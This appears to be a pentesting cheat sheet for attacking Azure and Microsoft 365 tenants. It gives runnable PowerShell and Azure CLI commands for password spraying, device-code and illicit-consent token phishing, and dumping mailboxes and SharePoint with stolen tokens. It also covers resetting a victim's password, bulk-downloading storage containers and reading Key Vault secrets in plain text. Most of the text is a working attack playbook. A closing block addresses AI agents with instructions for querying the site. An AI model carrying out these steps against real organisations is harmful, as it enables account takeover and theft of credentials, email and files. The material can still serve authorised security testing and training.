# Azure ## Getting Access The first part of Azure pentesting is trying to get access. This can be done via various methods 1. Brute forcing accounts 2. Phishing for tokens 3. Connecting to public resources that may contain credentials ### Brute Forcing We can use `MSOL-Spray` to spray a password for different accounts {% embed url="" %} ```powershell Import-Module .\MSOLSpray-master\MSOLSpray.ps1 Invoke-MSOLSpray -UserList .\userlist.txt -Password Password123 [*] There are 5 total users to spray. [*] Now spraying Microsoft Online. [*] Current date and time: 04/18/2022 14:22:05 ``` ### Phishing Links There are two ways to phish for tokens 1. Token Tactics 2. Illicit Consent Attacks #### Token Tactics {% embed url="" %} We can use Token Tactics to generate a phishing link to send to the user ```powershell Import-Module .\TokenTactics-main\TokenTactics.psd1 > Get-AzureToken -Client MSGraph user_code : C4UJUN7B3 device_code : CAQABAAEAAAD--DLA3VO7Qr… verification_url : https://microsoft.com/devicelogin expires_in : 900 interval : 5 message : To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code C4UJUN7B3 to authenticate. authorization_pending ``` Now we send the email to the target

When victim clicks and enters the code, we will get his access token

#### Illicit Consent Attacks This method of attack assumes you have already breached the portal, and we can further elevate our privileges by creating an application with excessive RW permissions, and trick a user to consenting the application to access data on their behalf. There are some pre-requisites to this In the portal, it should say that users can register applications

In User Consent Settings for Enterprise Applications, it should be configured such that users can allow consent for apps

Now we can create an application, and grant it excessive delegated permissions such as reading all data, users and files.

We then need to configure `365-Stealer` {% embed url="" %} Enter the Application ID, Application Secret and Return URL

Now we run the server, and when the user clicks consent to the application, we can get their token with all the delegated permissions we obtained earlier ```powershell python .\365-Stealer.py --run-app ```

## A note about tokens I've written a short blog post here to describe the tokens and their related permissions {% embed url="" %} ## Enumeration using Tokens Once we have access and we have the tokens of the users, we can start enumerating to see what other resources we can access We can do this via accessing Emails or SharePoint resources ### Email dumping We use Token Tactics again to dump emails using the access token ```powershell Import-Module .\TokenTactics-main\TokenTactics-main\TokenTactics.psd1 Dump-OWAMailboxViaMSGraphApi -AccessToken $access_token -mailFolder AllItems ``` ### SharePoint dumping Listing files in SharePoint ```powershell $Token = 'eyJ0eXAiOiJKV1QiLCJub25jZSI6InNkZENGd2gzbDlqampfeXhjU0VtLTI1VUlRN0gzc29Ka 2tiZnVMR3BrT1kiLCJhbGciOiJSUzI1NiIsIn[...]RGpfNTJ2YndHTmd2UU8yVnpNYyIsImtp ZCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyJ9.eyJhdWQiOiJod' $URI = 'https://graph.microsoft.com/v1.0/me/drive/root/children' $RequestParams = @{ Method = 'GET' Uri = $URI Headers = @{ 'Authorization' = "Bearer $Token" } } (Invoke-RestMethod @RequestParams).value ``` If we see a resource with download links at `@microsoft.graph.downloadUrl`, we can visit the URL to download the file

## Enumeration using Credentials If we have user credentials obtained from Brute Forcing, Dumping emails and SharePoint enumeration, we can do deeper enumeration of the Azure Environment We can either use Azure CLI, or Azure PowerShell cmdlets The functionalities between these two approaches are similar, with each tool having slightly unique capabilites ### Logging In Logging in with normal user credentials ```powershell az login -u "user@domain.com" -p "password" --allow-no-subscriptions ``` ```powershell $password = ConvertTo-SecureString 'password' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('user@domain.com', $password) Connect-AzAccount -Credential $creds ``` Logging in with SPN accounts In order to authenticate with SPN, we need the following: 1. Client ID 2. Client Secret 3. Tenant ID Client ID and Secret should be obtained via other forms of resource enumeration. We can get Tenant ID by visiting `https://login.microsoftonline.com//.well-known/openid-configuration` For example ``` https://login.microsoftonline.com/dummy.onmicrosoft.com/.well-known/openid-configuration ``` Now we can login ```powershell az login --service-principal -u -p --tenant ``` ```powershell $password = ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential(, $password) Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant ``` ### Enumerating Resources ``` az resource list ``` ``` Get-AzResource ``` In the event where you see a container, but the resources are not being shown due to permission issues, we can download them to our local machine instead

# 1. to get the name of the storage
az storage account list 

# 2. get the keys for the storage
 az storage account keys list --account-name "storagename"

# 3. get the container name
az storage container list --account-name "storagename" --account-key <key_value>  

# 4. download all files in the container
az storage blob download-batch -d . -s mycontainer --account-name "storagename" --account-key <key value>

Or, we can use `Storage Explorer.exe` to connect to subscriptions or publicly accessible storage containers {% embed url="" %} ### Listing Roles We need to look out for custom roles, which are user created non-standard roles which contain special privileges ```powershell az role assignment list --all az role definition list --custom-role-only ``` ```powershell Get-AzRoleAssignment ``` ### Listing Users Listing all users in the Azure AD ```powershell az ad user list ``` ```powershell Get-AzADuser ``` ### Listing Groups Getting groups on the AD, as well as group memberships ```powershell az ad group list ``` ```powershell az ad group member list --group 01086658-6706-44e8-a373-96ab550c72f7 ``` ```powershell Get-AzADGroup ``` ```powershell Get-AzADGroupMember -ObjectId 01086658-6706-44e8-a373-96ab550c72f7 ``` ### Listing Roles in Azure AD For this, we need to run `Connect-AzureAD` with the credentials ```powershell $password = ConvertTo-SecureString 'password' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('user@domain.com', $password) Connect-AzureAD -Credential $creds ``` Then we list available roles ```powershell Get-AzureADDirectoryRole ``` And list members who have the role ```powershell Get-AzureADDirectoryRole -ObjectId b5da7126-cb27-48e6-a316-e319ba453b65 | Get-AzureADDirectoryRoleMember ```

If we have a role that can reset passwords, we can do so with these commands ```powershell $password = "newpassword" | ConvertTo-SecureString -AsPlainText -Force (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@domain.com"}).ObjectId | Set-AzureADUserPassword -Password $Password -Verbose ``` ### Access Password Vaults After listing resources, if we see password vaults, we can access the plain text passwords stored in them. Vaults require special types of tokens to access. These tokens can be obtained with Azure CLI ```powershell az account get-access-token --resource https://vault.azure.net ``` Once we have the token, we use Azure PowerShell cmdlet to access the data ```powershell Connect-AzAccount -AccessToken $AccessToken -KeyVaultAccessToken $KeyVault -AccountId e763211c-0447-4a4f-9e9c-da98c94a5f40 ``` ```powershell Get-AzKeyVaultSecret -VaultName Secret-Vault Get-AzKeyVaultSecret -VaultName Secret-Vault -Name passwords -AsPlainText ``` ## Requesting for Tokens After we have authenticated as a user on Azure CLI, we can request for more token to access other services such as GraphAPI or Azure Password vaults ``` az account get-access-token --resource https://management.azure.com az account get-access-token --resource https://vault.azure.net az account get-access-token --resource https://graph.windows.net ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sheepwall.gitbook.io/home/cloud-hacking/azure.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.